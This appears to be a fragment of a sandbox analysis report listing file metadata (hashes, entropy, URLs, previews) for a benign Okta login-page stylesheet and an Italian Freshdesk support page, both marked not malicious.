                                                                                  SHA-512:EF838FD58E0D12596726894AB9418C1FBE31833C187C3323EBFD432970EB1593363513F12114E78E008012CDEF15B504D603AFE4BB10AE5C47674045ACC5221E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.css
                                                                                  Preview:a,abbr,acronym,address,applet,b,big,blockquote,body,caption,center,cite,code,dd,del,dfn,div,dl,dt,em,fieldset,form,h1,h2,h3,h4,h5,h6,html,i,iframe,img,ins,kbd,label,legend,li,object,ol,p,pre,q,s,samp,small,span,strike,strong,sub,sup,table,tbody,td,tfoot,th,thead,tr,tt,u,ul,var{background:transparent;border:0;font-size:100%;font:inherit;margin:0;outline:0;padding:0;vertical-align:baseline}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:after,blockquote:before,q:after,q:before{content:"";content:none}:focus{outline:0}ins{text-decoration:none}del{text-decoration:line-through}table{border-collapse:collapse;border-spacing:0}input[type=hidden]{display:none!important}input[type=checkbox],input[type=radio]{border:0!important;margin:0;padding:0}@font-face{font-family:Proxima Nova;font-style:normal;font-weight:400;src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot);src:url(../font/assets/proximanova-reg-webfont.9d5837512674046fa816.eot?#iefix) fo
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, Unicode text, UTF-8 text, with very long lines (39375), with CRLF, LF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):157478
                                                                                  Entropy (8bit):6.124351416015706
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:C5C7C7B1F11DB1BBFCCD836EE0BE2F82
                                                                                  SHA1:6102726A33361003F9F1EDE86558621798E4338C
                                                                                  SHA-256:9BDD2182D1F2F4781C84F31118C8D2189D2CD8CA27A63103EE4D4F363F628722
                                                                                  SHA-512:10DAB73426859529EC5F4B9683AF49182C1CD218527965E16C19597CD21DF3AD8776BD49F0EC3D450EDDAC19751B41ACA5E513DD007AEE93A5558D594EDAA610
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0
                                                                                  Preview:<!DOCTYPE html>.<html lang="en" data-date-format="non_us" dir="ltr">..<head>. <meta name="robots" content="noindex, nofollow">.. <meta name="csrf-param" content="authenticity_token" />.<meta name="csrf-token" content="A5OzuSP72nOBkPykLK02nji4tfwkQU43eI7+QplMTY7Q/isC7911ujIE5QIuXsOSDAOLSCqtojI+jVM7mfbtyQ==" />.. <link rel='shortcut icon' href='/assets/misc/favicon.ico?702017' />.. Title for the page -->.<title> Prossimo cambio di qualit. : Enervit </title>.. Meta information -->.. <meta charset="utf-8" />. <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />. <meta name="description" content= "" />. <meta name="author" content= "Sofia Marradi" />. <meta property="og:title" content="Prossimo cambio di qualit." /> <meta property="og:url" content="https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0" /> <meta property="og:description" content=" Sofia Marradi ha condiviso un docum
                                                                                  No static file info